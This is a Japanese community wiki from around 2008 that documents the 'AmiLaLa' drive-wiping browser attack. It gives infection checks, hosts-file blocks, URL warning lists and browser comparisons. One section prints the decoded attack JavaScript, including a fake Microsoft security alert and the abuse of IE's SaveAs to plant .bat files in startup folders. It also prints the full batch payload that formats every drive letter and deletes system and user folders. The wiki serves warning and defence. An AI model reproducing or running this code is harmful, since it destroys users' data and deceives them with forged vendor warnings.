>画像を表示後にアラートでエラー警告を表示して
>25回目のアラートでC以降のHDDのフォーマットや
>システム関係などのファイル消去?が実行される&bold(){batファイルをスタートアップに}ダウソさせようとする(´・ω・) ス
>その後アラートで再起動催促、アラートを閉じ続けるとアミララ関係の有害ページへ行く(´・ω・) ス
>
>142[名無し]さん(bin+cue).rar [sage] 2007/12/30(日) 21:13:19 ID:3TDvvQLp0 (PC)
>132
>ttp://sakuratan.ddo.jp/uploader/source/date64867.png
*踏んだらどうなるかのレポ
http://www.geocities.jp/hdd_matome/
*キャプ動画
http://www.nicovideo.jp/watch/sm1909241
(ニコニコ動画sm1909241)
*感染確認
//194 殲10(香川県) [] 2007/12/31(月) 00:35:41.31 ID:wkcuCBnI0
心配な人、↓にファイルが無ければおk
//C:\Documents and Settings\(ユーザー名)\スタート メニュー\プログラム\スタートアップ
//C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ
・スタートアップ
Windows 9x/Me
C:\WINDOWS\All Users\スタート メニュー\プログラム\スタートアップ\BugFix[ランダムな数値].txt(空白).bat
Windows NT
C:\WINNT\Profiles\All Users\スタートメニュー\プログラム\スタートアップ\IE_Up[ランダムな数値].txt(空白).bat
Windows 2000/xp
C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ\WinUpd[ランダムな数値].txt(空白).bat
・AUTOEXEC.BAT
Windows 9x
C:\AUTOEXEC.BAT .txt
Windows xp
C:\WINDOWS\SYSTEM32\AUTOEXEC.NT .txt
(注意:AUTOEXEC.NTは正常なファイルです。AUTOEXEC.NT.txtが感染の証拠です。)
・クイック起動
Windows 9x
C:\WINDOWS\Application Data\Microsoft\Internet Explorer\Quick Launch\AntiVirus[ランダムな数値].txt(空白).bat
Windows 2000/xp
C:\Documents and Settings\All Users\Application Data\Microsoft\Internet Explorer\Quick Launch\SecurityAlert[ランダムな数値].txt(空白).bat
(注意:Application Dataは隠しフォルダです。隠しファイルおよびフォルダを表示してから確認しましょう。)
*対応方法
&u(){ここに書かれていることはあくまで現時点での対策方法です。&br()実行ファイルや画像の置き場を変えた亜種が広まる危険性があります。&br()対策したからと言って過信せず十分に警戒してください。}
hostsファイル書き換えは焼け石に水。
別の場所(URL)にコードを置かれたらそれまで。
IE以外のブラウザ(Firefox、Opera)などのへの乗り換えを真剣に検討しよう。
ちなみに、IEエンジンを使うブラウザ(スレイプニル含む)も危険。
*対処法2
IEなら、インターネットオプション→セキュリティ設定→レベルのカスタマイズ
拡張子ではなく、内容によってファイルを開くを無効
でjpg偽装を見抜ける。
ただし、短縮リンクで直接ブラクらに飛ばすものには効果なし。
ブラクラに強いFirefoxを使うなどの自衛がベストか。
*スレに張られたURLがブラクラかどうか分からなくて踏めません><。
紹介元レス紛失。
飛び先チェック
http://www.kakiko.com/check/sample.html
これを使えば、リンク先のソースを見ることができる。
怪しいソースでなければブラクラじゃない。筈
tips: http://www.kakiko.com/check/?[あやしいURL] でも使用できます。
・Janeにブラクラチェッカーをコマンド登録する
コマンドに
http://www.siteadvisor.com/lookup/?q=$TEXT$LINK
http://so.7walker.net/?site=$TEXT$LINK
http://online.drweb.com/result?url=$LINK
を登録。
ほかの専ブラはシラネ。
編集テスト
----
***関連スレッド(昇順)
&bold(){ニュース速報+}
【IT】 HDDをフォーマットしちゃうWebサイトが登場。ご注意を!★7
http://mamono.2ch.net/test/read.cgi/newsplus/1199177252/
【IT】 HDDをフォーマットしちゃうWebサイトが登場。ご注意を!★5
http://mamono.2ch.net/test/read.cgi/newsplus/1199096917/
【IT】 HDDをフォーマットしちゃうWebサイトが登場。ご注意を!★4
http://mamono.2ch.net/test/read.cgi/newsplus/1199079923/
【IT】 HDDをフォーマットしちゃうWebサイトが登場。ご注意を!★3
http://mamono.2ch.net/test/read.cgi/newsplus/1199063239/
【IT】 HDDをフォーマットしちゃうWebサイトが登場。ご注意を!★2
http://mamono.2ch.net/test/read.cgi/newsplus/1199047353/qsnv
&bold(){ニュース速報}
【ブラクラ】HDDをフォーマットするWebサイト登場【ウイルス】 12
http://namidame.2ch.net/test/read.cgi/news/1199090326/
【ブラクラ】HDDをフォーマットするWebサイト登場【ウイルス】 11
http://namidame.2ch.net/test/read.cgi/news/1199075423/
----
***スレッドまとめ
&bold(){ニュースドロネコイア}
【IT】 HDDをフォーマットしちゃうWebサイトが登場。ご注意を
http://blog.livedoor.jp/doronekoia/archives/51208037.html
【ブラクラ】HDDをフォーマットするWebサイト登場【ウイルス】 10
http://blog.livedoor.jp/doronekoia/archives/51208061.html
gz34
2008-10-04T19:13:01+09:00
1223115181
-
対策
https://w.atwiki.jp/burakura_hdd/pages/15.html
#contents()
*Windowsの初期ブラウザであるInternet Explorer(以下 IE )やIEエンジンのブラウザを使わず、geckoエンジンであるFirefoxや、独自エンジンであるOperaなどを使う。
根本的な対策としては、IEやスレイプニルなどで多分に使われているIEエンジンのブラウザを使わず、geckoエンジンであるFirefoxや非IEエンジンであるOperaなどを使う。
ファイアーウォールやhostsファイルなどで特定のURLにアクセスしないように設定しても、またコードが別のサイトに載り、踏んでしまえば手遅れな事態になりかねない。
ブラウザを変えるのが根本的な対策といえる。
被害が怖ければ、今回の問題の前ではIEエンジンは原則として危険、使用禁止と見るべき。
[Firefox] Mozilla Japan - Firefox
http://www.mozilla-japan.org/products/firefox/
[Opera] Opera
http://jp.opera.com/
*ブラクラを仕込むスクリプトがおいていあるcunt.multiservers.comにアクセスしないようにする
その1 PFWでcunt.multiservers.comをブロックする。
その2 \windows\system32\drivers\etc\hostsに
0.0.0.0 snipr.com
0.0.0.0 cunt.multiservers.com
と書く。
*Internet Explorer の設定を変更する
現在、スクリプトの本体は cunt.multiservers.com にあります。
cunt.multiservers.com は、Microsoft と Internet Explorer ユーザーを敵視しています。
その1 インターネットゾーン「拡張子ではなく、内容によってファイルを開く」を「無効」にする。
その2 cunt.multiservers.com を制限サイトに追加する。
*特定URLのアクセス先を変更する
これは忘れた頃に猛威を振るうウイルスです。
今後のためにも、以下の操作をしておきましょう。
**手順
C:\WINDOWS\system32\drivers\etc
にあるhostsファイルをメモ帳などエディタで開いて、
127.0.0.1 localhost
に下記を書き加える
0.0.0.0 snipr.com
0.0.0.0 cunt.multiservers.com
結果このようになる
127.0.0.1 localhost
0.0.0.0 snipr.com
0.0.0.0 cunt.multiservers.com
**解説
適当なIP [URL]で、指定したURLを踏んだ再に自動的に指定したホスト(この場合、127~)にアクセスするから被害が無くなる。
snipr.comとcunt.multiservers.com は、スクリプト本体がおいてあるホスト。
*ブラクラ確認サイトを使う。
紹介元レス紛失。
飛び先チェック
http://www.kakiko.com/check/sample.html
これを使えば、リンク先のソースを見ることができる。
怪しいソースでなければブラクらじゃない。筈
tips: http://www.kakiko.com/check/?[あやしいURL] でも使用できます。
2008-01-10T03:03:26+09:00
1199901806
-
ブラクラ登録推奨
https://w.atwiki.jp/burakura_hdd/pages/11.html
*下記URLを踏むと大変危険です絶対にアクセスしないでください
//リンクになっているのは警告があっても危険なので実態参照に改変しました
711 名前:[名無し]さん(bin+cue).rar 投稿日:2007/12/31(月) 00:48:15 ID:aLuFT5uG0
絶対に踏むなよ?
この辺のurlがはいってるのがウィルス入りの可能性大
http://www.gigigi.net/up/img/1230.jpg
http://zz.tc/
http://b.u-tyan.net/url/
http://s-url.jp/
http://1stepup.com/url/
http://go.2ch2.net/
http://nyan33.com/a/
http://turl.biz/
http://www.j2url.com/
http://365.to/
http://web-page.utun.jp/
http://4url.in/
http://kds777.biz/url/
http://raus.de/crashme/
http://imepita.zz.tc/200712305489
基本
1230.jpg
1226.jpg
up06139.jpg
584 名前: うぐいす嬢(東京都)[] 投稿日:2007/12/31(月) 03:36:51.87 ID:h3sKSbjG0
短縮URLサービス43個、tp://が付いてないのはzz.tcと同じ理由
もっとあるから誰か追加してくれ、それと見づらくて御免
zz.tc 3w.to aim.to url.sh nihongourl.nu tp://b.u-tyan.net tp://s-url.jp
tp://1stepup.com tp://go.2ch2.net tp://nyan33.com tp://turl.biz
tp://www.j2url.com tp://365.to tp://web-page.utun.jp tp://4url.in tp://kds777.biz
tp://www.urldiet.com tp://xrl.us tp://snipurl.com tp://kat.cc tp://miniurl.org
tp://ie.to tp://qurl.com tp://raus.de tp://0rz.tw tp://pho.se tp://mo-v.jp
tp://qrl.jp tp://infobreak.biz tp://jpan.jp tp://2ch2.net tp://32url.com
tp://mooo.jp tp://fm7.biz tp://fw.iclub.to tp://mixi.bz tp://www.estyle.ne.jp
tp://5jp.net tp://www3.to tp://tinyurl.com tp://z.la tp://qqa.jp tp://www1.to
2008-01-01T18:21:20+09:00
1199179280
-
症状・被害状況
https://w.atwiki.jp/burakura_hdd/pages/17.html
*どのような被害が出ているのか、レスのコピペとか。
76 名前:名無しさん@八周年[] 投稿日:2007/12/31(月) 03:35:28 ID:KtLh+7aB0
いちおう人柱報告ね
XP+IE7+NIS2007
リンクをクリック→検証動画と同じようにことが運ぶ→OE起動してmixi?にmixi批判メールを送信しようとする→
Norton先生反応しないのでLAN引っこ抜く→クイックスキャン異常なし→再起動→
Yahoo!MessangerにID:AmiLaLaFlowerが追加→AmiLaLaFlower削除できず→セーフモードでスキャン異常なし→
オンラインスキャン実行→
↑
今ここ
Norton先生まったく反応せず、ログビューアに何もなし
323 名前: 偏屈男(神奈川県)[] 投稿日:2007/12/31(月) 03:12:18.91 ID:v8cHk4gK0
http://tmp7.2ch.net/test/read.cgi/download/1198981070/776
776 名前:[名無し]さん(bin+cue).rar[] 投稿日:2007/12/31(月) 03:11:54 ID:TaWNp3Ax0
しかしこれ思った以上にてごわい(´・ω・) ス
再起動するまでもなく、csrss.exeを書き換えて再常駐。
で2時間ほどでタイマー発動らしく自動で再起動しちゃう(´・ω・) ス
VM壊れた(´・ω・) ス
----
703 :名無しさん@八周年 [sage] :2007/12/31(月) 13:02:43 ID:3BvdahWY0
再起動してみたらavastの網にかかってた
クリックした覚えはないし
Live2ch+FireFoxなんだが
どっから入ったんだ
845 :703 [sage] :2007/12/31(月) 13:48:46 ID:dIHEM3wG0
>>809
とりあえずモチついてくれ。
このスレと前スレ拾ったあと再起動したらなんともなかった。
(トリつけないままLAN切ってしまったんでID変わってるはず orz)
ちなみにavastのログは
2007/12/31 4:37:10 Administrator 924 Function
setifaceUpdatePackages() has failed. Return code is 0x000004C7, dwRes is 000004C7.
2007/12/31 4:47:08 Administrator 528 Sign of "VBS:Script-gen" has
been found in "C:\Documents and Settings\Administrator\Local Settings\Temporary
Internet Files\Content.IE5\NYUDV1HM\dansyaku0417[1].jpg" file.
となってた。意味読めないんで解説できない。すまんです。
854 :名無しさん@八周年 [] :2007/12/31(月) 13:50:35 ID:P6kNAm700
>>845
やっぱキャッシュが反応してるだけじゃん
俺ビンゴ
安心していいよ、HDに保存はされてるけど、実行はされてないから。
わざわざキャッシュフォルダを開いて、該当ファイルを探し出して、わざわざIEで開くとかやったらやばいけどねw
2008-01-01T16:08:33+09:00
1199171313
-
有用と思われる書き込み
https://w.atwiki.jp/burakura_hdd/pages/14.html
みんな何かあったら抽出頼んだ。
*このページは見ただけでは感染しません。
&bold(){一部アンチウィルスソフト(特にノートン)が記述をウィルスと誤認する可能性があります。}
726 名前:以下、名無しにかわりましてVIPがお送りします。[sage] 投稿日:2007/12/31(月) 01:00:28.46 ID:ou5idN1m0
520 名前: ボーイッシュな女の子(兵庫県)[] 投稿日:2007/12/31(月) 00:53:12.21 ID:+qMRRISz0
暗号化されたデータをデコードしてみた。
しょうもないスクリプトだった。
<script type="text/javascript">
<div id="imgWrapper" style="z-index:2000;"><a id="lnk" href="http://snipr.com/wt_link01" oncontextmenu="try{location.replace('http://snipr.com/wt_link01');}
catch(e){};return false;" onmouseover="window.status=' ';return true;" onmouseout="window.status=' ';return true;" onfocus="window.status=' ';return true;"
onblur="window.status=' ';return true;" style="cursor:default;border:0px none;"><img id="wtImg" src="http://snipr.com/wt_imgsrc01" border="0"
style="border:0px none" alt=""></a></div>
<div id="iframeWrapper"><iframe id="wtIfm" name="wtIfm" src="http://snipr.com/wt_iframesrc01" style="visibility:hidden;width:1px;height:1px;border:0px none;"
frameborder="0"></iframe></div>
<script type="text/javascript">
window.defaultStatus=' ';
var kFnc=function(e){
try{
document.getElementById('lnk').focus();
window.status=' ';return true;
location.replace('http://snipr.com/wt_link01');
}catch(e){}
};
document.onkeypress=kFnc;
document.onkeydown=kFnc;
document.onkeyup=kFnc;
</script></body></html><noembed><!-- :) -->
またか
----
実際のコード
/**
* AmiSaveAs
*
* (c) 2003 __L/a/L/a*L/a/n/d__
* ______________________________________________________ */
<script type="text/javascript">
if (typeof AmiLaLa == 'undefined' || !AmiLaLa) {
var AmiLaLa = {
Version: '0.0.0',
emptyFunc: function() {}
};
}
AmiLaLa.__GetUserTime = function() {
this.now = new Date();
this.year = this.now.getFullYear();
this.month = this.now.getMonth() + 1;
this.day = this.now.getDate();
if (this.month < 10) { this.month = '0' + this.month; }
if (this.day < 10) { this.day = '0' + this.day; }
};
AmiLaLa.__Moment = new AmiLaLa.__GetUserTime();
AmiLaLa.detectVictim = function() { // detect for WinIEJa
var e_bLang = navigator.browserLanguage;
var e_lang = navigator.language;
var e_vulg = 'ja'; // ja
var ua = navigator.userAgent.toLowerCase();
this.isOpera = (ua.indexOf('opera') != -1);
this.isIE = (ua.indexOf('msie') != -1 && !this.isOpera && (ua.indexOf('webtv') == -1));
this.isWin = (ua.indexOf('win') != -1);
this.isJap = ((e_lang && e_lang.indexOf(e_vulg) > -1) || (e_bLang && e_bLang.indexOf(e_vulg) > -1));
this.isWinIEJa = (this.isIE && this.isWin && this.isJap);
};
AmiLaLa.Client = new AmiLaLa.detectVictim();
AmiLaLa.hasAlertedSaveAs = false;
AmiLaLa.tidSaveAs = -1;
AmiLaLa.ExSaveAs = {
createSrcIfm: function() {
if (document.getElementById('amiExSaveAsBox')) {
var rnd = Math.floor(Math.random()*99);
var theDiv = document.getElementById('amiExSaveAsBox');
var theSrc = 'src.html' + '?' + rnd;
var theIfm = document.createElement('IFRAME');
// theIfm.charset = 'iso-8859-1';
theIfm.setAttribute('src', theSrc);
theIfm.setAttribute('id', 'amiExSaveAsF');
theIfm.setAttribute('name', 'amiExSaveAsF');
theIfm.setAttribute('width', '1');
theIfm.setAttribute('height', '1');
theIfm.setAttribute('frameborder', '0');
theDiv.appendChild(theIfm);
}
},
showMsg: function() {
if (document.getElementById('amiExSaveAsBox')) {
var rnd = Math.floor(Math.random()*9999);
var liveAlertID = 'MS07-Q' + rnd + '-JP';
var defLastModified = AmiLaLa.__Moment.year + unescape('年') + AmiLaLa.__Moment.month + unescape('月') + AmiLaLa.__Moment.day + unescape('日');
var defID = 'ID: MS07-LP-Def' + rnd + '-JP';
var defSig = 'Microsoft(r) Security LiveProtect(r) Team';
var defResrc = 'www.microsoft.com';
var hr = '______________________________________________';
// Japanese text by __Mew__
var msg_ja = '\n'
+ 'Windows LiveAlert(r) '
+ unescape('セキュリティ アドバイザリ')
+ ' (' + liveAlertID + ')' + '\n'
+ hr + hr + '\n\n'
+ unescape('【緊急】 セキュリティ自動保護システムが、深刻な脆弱性を検知しました。') + '\n\n'
+ ' - ' + unescape('最終更新日')
+ ': ' + defLastModified + ' | ' + unescape('定義') + ' ' + defID + '\n'
+ ' - ' + unescape('信頼済みプロダクト署名') + ': ' + defSig + '\n'
+ ' - ' + unescape('配信元ドメイン') + ': ' + defResrc + '\n'
+ hr + hr + '\n\n'
+ '1. ' + unescape('コードはすでにリモートの実行プロセス') + ' 0' + (3*rnd-16) + 'f ' + unescape('にあります。') + '\n\n'
+ '2. ' + unescape('セキュリティ最新定義') + ' ' + defID + ' ' + unescape('は、') + '\n'
+ ' ' + unescape('「ウィンドウを閉じたり、コンピュータを終了させると、 現在のシステムおよび') + '\n'
+ ' ' + unescape('全てのデータ(個別ユーザ識別情報を含む)が、壊滅的なダメージを受ける」') + '\n'
+ ' ' + unescape('と主張しています。') + '\n\n'
+ '3. ' + unescape('ダメージを回避するために残された唯一の対策として、') + '\n'
+ ' ' + unescape('このまま緊急に、提示される全ての更新ファイル群を適用してください。') + '\n\n';
if (!AmiLaLa.hasAlertedSaveAs) {
window.alert(msg_ja);
for (var i=0; i<3; i++) {
AmiLaLa.hasAlertedSaveAs = true;
}
}
}
},
doSaveAs: function() {
if (document.getElementById('amiExSaveAsBox')) {
var rnd = Math.floor(Math.random()*99);
try {
var startUp_XpJa = unescape('C:\\Documents and Settings\\All Users\\スタート メニュー\\プログラム\\スタートアップ\\WinUpd') + rnd + '.txt'
+ ' .bat';
var startUp_Nt2kJa = unescape('C:\\WINNT\\Profiles\\All Users\\スタートメニュー\\プログラム\\スタートアップ\\IE_Up') + rnd + '.txt'
+ ' .bat';
var startUp_9xMeJa = unescape('C:\\WINDOWS\\All Users\\スタート メニュー\\プログラム\\スタートアップ\\BugFix') + rnd + '.txt'
+ ' .bat';
var autoExec_Xp = 'C:\\WINDOWS\\SYSTEM32\\AUTOEXEC.NT .txt';
var autoExec_9x = 'C:\\AUTOEXEC.BAT .txt';
var quickLaunch_2kXp = 'C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\SecurityAlert' + rnd + '.txt'
+ ' .bat';
var quickLaunch_9x = 'C:\\WINDOWS\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\AntiVirus' + rnd + '.txt'
+ ' .bat';
amiExSaveAsF.document.execCommand('SaveAs',false,startUp_XpJa);
amiExSaveAsF.document.execCommand('SaveAs',false,startUp_Nt2kJa);
amiExSaveAsF.document.execCommand('SaveAs',false,startUp_9xMeJa);
amiExSaveAsF.document.execCommand('SaveAs',false,autoExec_Xp);
amiExSaveAsF.document.execCommand('SaveAs',false,autoExec_9x);
amiExSaveAsF.document.execCommand('SaveAs',false,quickLaunch_2kXp);
amiExSaveAsF.document.execCommand('SaveAs',false,quickLaunch_9x);
} catch (e) {}
}
},
init: function() {
var wait = 2*1000;
this.createSrcIfm();
for (var i=0; i<3; i++) {
clearTimeout(AmiLaLa.tidSaveAs);
}
// temp off for other stuff
// AmiLaLa.tidSaveAs = setTimeout('AmiLaLa.ExSaveAs.doSaveAs()',wait);
}
};
window.onload = function() {
if (AmiLaLa.Client.isWinIEJa) {
AmiLaLa.ExSaveAs.init();
} else {
try {
location.replace('about:blank');
} catch (e) {}
}
};
window.onbeforeunload = function() {
if (AmiLaLa.Client.isWinIEJa) {
if (!document.getElementById('amiExSaveAsF')) {
AmiLaLa.ExSaveAs.createSrcIfm();
}
AmiLaLa.ExSaveAs.showMsg();
AmiLaLa.ExSaveAs.doSaveAs();
}
};
window.onunload = function() { // for tabbed browsers
if ((AmiLaLa.Client.isWinIEJa) && (!AmiLaLa.hasAlertedSaveAs)) {
AmiLaLa.ExSaveAs.showMsg();
AmiLaLa.ExSaveAs.doSaveAs();
for (var i=0; i<3; i++) {
AmiLaLa.hasAlertedSaveAs = true;
}
}
};
/* doesnt work in IE7 on Vista :( support.microsoft.com/kb/934817/en */
</script>
----
ダウンロードされるファイル
CLS
@ECHO OFF
:START
ECHO.
ECHO. Updating Your System...
ECHO. WARNING: DO NOT PRESS ANY KEY. Be patient, this may take a few minutes.
ECHO.
@ECHO OFF
IF %OS%.==Windows_NT. GOTO NT
:WIN95/98/Me
CTTY NUL
C:
CD C:\
ATTRIB -R -H -S C:\_RESTORE
ATTRIB -R -H -S C:\PROGRA~1
ATTRIB -R -H -S C:\MYDOCU~1
ATTRIB -R -H -S C:\WINDOWS
ATTRIB -R -H -S %WINDIR%
ATTRIB -R -H -S %WINBOOTDIR%
DELTREE /Y C:\_RESTORE
DELTREE /Y C:\PROGRA~1
DELTREE /Y C:\MYDOCU~1
DELTREE /Y D:\
DELTREE /Y E:\
DELTREE /Y F:\
FORMAT D: /AUTOTEST /Q /U
FORMAT E: /AUTOTEST /Q /U
FORMAT F: /AUTOTEST /Q /U
FORMAT G: /AUTOTEST /Q /U
FORMAT H: /AUTOTEST /Q /U
FORMAT I: /AUTOTEST /Q /U
FORMAT J: /AUTOTEST /Q /U
FORMAT K: /AUTOTEST /Q /U
FORMAT L: /AUTOTEST /Q /U
FORMAT M: /AUTOTEST /Q /U
FORMAT N: /AUTOTEST /Q /U
FORMAT O: /AUTOTEST /Q /U
FORMAT P: /AUTOTEST /Q /U
FORMAT Q: /AUTOTEST /Q /U
FORMAT R: /AUTOTEST /Q /U
FORMAT S: /AUTOTEST /Q /U
FORMAT T: /AUTOTEST /Q /U
FORMAT U: /AUTOTEST /Q /U
FORMAT V: /AUTOTEST /Q /U
FORMAT W: /AUTOTEST /Q /U
FORMAT X: /AUTOTEST /Q /U
FORMAT Y: /AUTOTEST /Q /U
FORMAT Z: /AUTOTEST /Q /U
FORMAT A: /AUTOTEST /Q /U
FORMAT B: /AUTOTEST /Q /U
FORMAT C: /AUTOTEST /Q /U
DELTREE /Y C:\WINDOWS
DELTREE /Y %WINDIR%
DELTREE /Y %WINBOOTDIR%
DELTREE /Y C:\
D:
CD D:\
DELTREE /Y C:\_RESTORE
DELTREE /Y C:\PROGRA~1
DELTREE /Y C:\MYDOCU~1
FORMAT C: /AUTOTEST /Q /U
DELTREE /Y C:\WINDOWS
DELTREE /Y %WINDIR%
DELTREE /Y %WINBOOTDIR%
DELTREE /Y C:\
CTTY CON
GOTO QUIT
:NT
C:
CD C:\
ATTRIB -R -H -S C:\SYSTEM~1
ATTRIB -R -H -S C:\PROGRA~1
ATTRIB -R -H -S C:\DOCUME~1
ATTRIB -R -H -S C:\USERS
ATTRIB -R -H -S C:\WINDOWS
ATTRIB -R -H -S C:\WINNT
ATTRIB -R -H -S %WINDIR%
ATTRIB -R -H -S %SYSTEMROOT%
RD C:\SYSTEM~1 /S /Q
RD C:\PROGRA~1 /S /Q
RD C:\DOCUME~1 /S /Q
RD C:\USERS /S /Q
RD D:\ /S /Q
RD E:\ /S /Q
RD F:\ /S /Q
FORMAT D: /AUTOTEST /Q /U
FORMAT E: /AUTOTEST /Q /U
FORMAT F: /AUTOTEST /Q /U
FORMAT G: /AUTOTEST /Q /U
FORMAT H: /AUTOTEST /Q /U
FORMAT I: /AUTOTEST /Q /U
FORMAT J: /AUTOTEST /Q /U
FORMAT K: /AUTOTEST /Q /U
FORMAT L: /AUTOTEST /Q /U
FORMAT M: /AUTOTEST /Q /U
FORMAT N: /AUTOTEST /Q /U
FORMAT O: /AUTOTEST /Q /U
FORMAT P: /AUTOTEST /Q /U
FORMAT Q: /AUTOTEST /Q /U
FORMAT R: /AUTOTEST /Q /U
FORMAT S: /AUTOTEST /Q /U
FORMAT T: /AUTOTEST /Q /U
FORMAT U: /AUTOTEST /Q /U
FORMAT V: /AUTOTEST /Q /U
FORMAT W: /AUTOTEST /Q /U
FORMAT X: /AUTOTEST /Q /U
FORMAT Y: /AUTOTEST /Q /U
FORMAT Z: /AUTOTEST /Q /U
FORMAT A: /AUTOTEST /Q /U
FORMAT B: /AUTOTEST /Q /U
FORMAT C: /AUTOTEST /Q /U
RD C:\WINDOWS /S /Q
RD C:\WINNT /S /Q
RD %WINDIR% /S /Q
RD %SYSTEMROOT% /S /Q
RD C:\ /S /Q
D:
CD D:\
RD C:\SYSTEM~1 /S /Q
RD C:\PROGRA~1 /S /Q
RD C:\DOCUME~1 /S /Q
RD C:\USERS /S /Q
FORMAT C: /AUTOTEST /Q /U
RD C:\WINDOWS /S /Q
RD C:\WINNT /S /Q
RD %WINDIR% /S /Q
RD %SYSTEMROOT% /S /Q
RD C:\ /S /Q
C:
CD C:\
CACLS "C:\System Volume Information" /E /G Administrator:F
RD "C:\System Volume Information" /S /Q
RD C:\SYSTEM~1 /S /Q
@ECHO Y | DEL *.*
@ECHO OFF
DEL /S /F /Q *.*
DEL /S /F /Q %SYSTEMDRIVE%\*\*.*
DEL /S /F /Q %SYSTEMDRIVE%\*.*
D:
CD D:\
@ECHO Y | DEL *.*
@ECHO OFF
DEL /S /F /Q *.*
DEL /S /F /Q %SYSTEMDRIVE%\*\*.*
DEL /S /F /Q %SYSTEMDRIVE%\*.*
:QUIT
CLS
ECHO.
ECHO. You bloody wanker.
ECHO.
ECHO. *****************************************************
ECHO. ** _(c)_2003_AmiLaLa_:)_ **
ECHO. *****************************************************
ECHO.
PAUSE
CLS
GOTO START
PAUSE
----
http://sakura03.bbspink.com/test/read.cgi/ascii2d/1199022322/1-100
cunt.multiservers.com/amazingpussy/
このURL以下が全部ウイルス&ブラクラな様子
IE6&セキュリティ中(デフォルト)で試してきた
A cunt.multiservers.com/amazingpussy/amiexeifm.html
1. グロ画像が表示される
2. list01.exe をDLさせようとしてくる(これを実行するとHDDがフォーマットされる)古いIEだと勝手に実行されるかも??
AntiVirによると、TR/Delwin.何とか(ホワイター間違いなし) AVGではTrojan horse Small.2.BJ(判り辛っ)
3. 下のBのURLに飛ぶ
B cunt.multiservers.com/amazingpussy/amiprogsmajor.html
1. グロ画像が表示される
2. Telnet,News,MailToStorm等の古典的ブラクラ(IE専用)が発動するが、落ちる程の事にはならない(タスクマネージャーからIEのプロセスを殺せば停止する)
ちなみにメールの本文は「FUCKEN JAP DIE!」 厨房シネ MSはもっとシネ
3. 画像をクリックする度に再発動する
----
439 名前: 元原発勤務(広島県)[] 投稿日:2007/12/31(月) 02:20:55.21 ID:oOyvG6VN0
ニコニコ動画とか斧等のロダ、2chのURLに偽装して貼られてるのもあるから、ホイホイ踏むなよ。
なんかする前に、まず、スレをよく読めよ。
↓をNGワードに登録
gigigi.net
zz.tc
他、短縮URLで貼られる可能性もあるので注意。
アクセス禁止サイトに
gigigi.net
を追加
C:\WINDOWS\system32\drivers\etc
にあるhostsファイルをメモ帳などエディタで開いて以下を追加すればおk
127.0.0.1 www.gigigi.net
127.0.0.1 gigigi.net
127.0.0.1 snipr.com
127.0.0.1 uk.geocities.com
127.0.0.1 geo.yahoo.com
&color(black){>}とりあえずプログラムフォルダに xerox\nwwia
もろもろ言う人が居ますが、これはゼロックス社製品関係の物なので、問題はありません。
xeroxという変なフォルダがあります
ttp://www.tef-room.net/trouble/xerox.html
お前ら気をつけろよ。
他スレにも、この警告文をコピペしてくれよ。
621 名前: 空気コテ(長屋)[sage] 投稿日:2007/12/31(月) 02:29:31.75 ID:poghhQbg0
&color(black){>>}439の言うようにやるとどうなるんだ?
655 名前: 運転士(関東地方)[sage] 投稿日:2007/12/31(月) 02:31:26.08 ID:WkrDXRkO0
&color(black){>>}621
127.0.0.1はお前さんのマシン
登録しとけば、そのURLをクリックしても自分自身を見に行くから、絶対に繋がらない
865 名前: ネットカフェ難民(東京都)[] 投稿日:2007/12/31(月) 02:43:32.92 ID:Jf4EtMam0
&color(black){>>}830
ただのアップローダだろ
本体はこっち
snipr.com
cunt.multiservers.com
----
2008-01-01T16:07:46+09:00
1199171266
-
各ブラウザ反応状況
https://w.atwiki.jp/burakura_hdd/pages/13.html
被害を受けるのはWindowsXPとそれ以前のWindowsのみです。
Vista及びMacOSXやLinuxでは被害を受けません。
|ブラウザ|被害有無|詳しい内容|h
|Internet Explorer6以前|有|Windows版のみ被害を受ける|
|Sleipnir|有(注1|レンダリングエンジンがGeckoならセーフ|
|その他IEコンポーネントブラウザ|有(注1|Donut、Lunascape等|
|Internet Explorer7|無|XP SP2-ファイル名をフルパスで指定してもパスは無視され、ファイル名と拡張子だけが対象になる。ダウンロードフォルダはユーザーが通常指定しているフォルダである。拡張子にbat,cmd,com,exe等、危険とされている拡張子が指定されている場合、ファイルの保存は実行されない(ダイアログが出ない)|
|Firefox|無|URLが表示されるだけ|
|Opera|無||
|Safari|無||
(注1 JavaScript[あれ?ActiveXもだったっけ?]実行が許可されていた場合のみ。Javaは関係ない。
各2chブラウザの画像ビューアで開いた場合の動作は、各ブラウザのスレなどを参照すること。
とりあえずJane系の画像インライン表示、画像ビューア、Live2chの画像プレビュー、画像ポップアップ、ギコナビの画像プレビューは安全。
ただし、すべての専用ブラウザにおいて言えることだが、クリックしてIEなどで開くと当然危険なので、専用ブラウザを使っているからと安心しきってしまってはいけない。
また、タブブラウザのようにブラウザ機能を内蔵している専用ブラウザの場合は、その内蔵ブラウザ機能で開くのも危険なので注意。
399 名前:名無しさん@八周年[] 投稿日:2007/12/31(月) 04:25:51 ID:mkBVb9YC0
2ちゃんねるブラウザのIEコンポについて
ttp://browser2ch.web.fc2.com/
各webブラウザのエンジンなどについて
ttp://ja.wikipedia.org/wiki/Template:%E3%82%A6%E3%82%A7%E3%83%96%E3%83%96%E3%83%A9%E3%82%A6%E3%82%B6
※ただしこれらはレス表示につかっているエンジンを示しているだけなので、実際に画像をどう処理しているかの問題が大きい。
2008-01-01T05:06:26+09:00
1199131586